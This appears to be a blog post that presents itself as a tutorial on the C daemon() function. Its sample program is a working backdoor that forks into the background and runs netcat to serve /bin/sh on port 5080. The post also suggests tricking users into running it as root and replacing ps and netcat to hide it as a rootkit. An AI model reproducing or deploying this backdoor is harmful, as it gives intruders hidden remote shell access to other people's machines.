This post will explain how to fork() off a daemon process from a program in C. This is good if you wish to run a process on a machine after the program has finished and you have been returned to the command prompt. The sample program below uses the int daemon(int nochdir, int noclose); function to spawn a separate process when the program is run. This means that you could show the user one thing and spawn something else in the background.
/* * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ /******************************************************************** * Description: Netcat backdoor program. * Author: John Cartwright,,, <> * Created at: Mon Aug 24 12:56:48 AEST 2015 * Computer: darkstar * System: Linux 3.16.0-4-amd64 on x86_64 * * Copyright (c) 2015 John Cartwright,,, All rights reserved. * ********************************************************************/ #include <stdio.h> #include <unistd.h> int main (int argc, char *argv[]) { printf("#*****************************************************#"); printf("#*****************************************************#"); printf("#*** Simple netcat backdoor. ***#"); printf("#*****************************************************#"); printf("#*****************************************************#"); // Start a netcat backdoor, running in the background. daemon(1,1); // fork() off into a daemon process. extern char * const environ[]; char * const command[] = {"nc", "-l", "-p", "5080", "-e", "/bin/sh", NULL}; execve("/bin/nc", command, environ); return 0; } |
The only problem with this is the user can see the process running with the ps ax command. The thing is that if a malicious programmer wants to create a backdoor rootkit, they would trick the user into running the program as root. Then the program would replace the ps, netcat and related commands. This means that if a user runs netcat or ps, they would not see the hidden processes. But the ease of use of the daemon() function makes it perfect for this task.
Read more about this function here: http://man7.org/linux/man-pages/man3/daemon.3.html.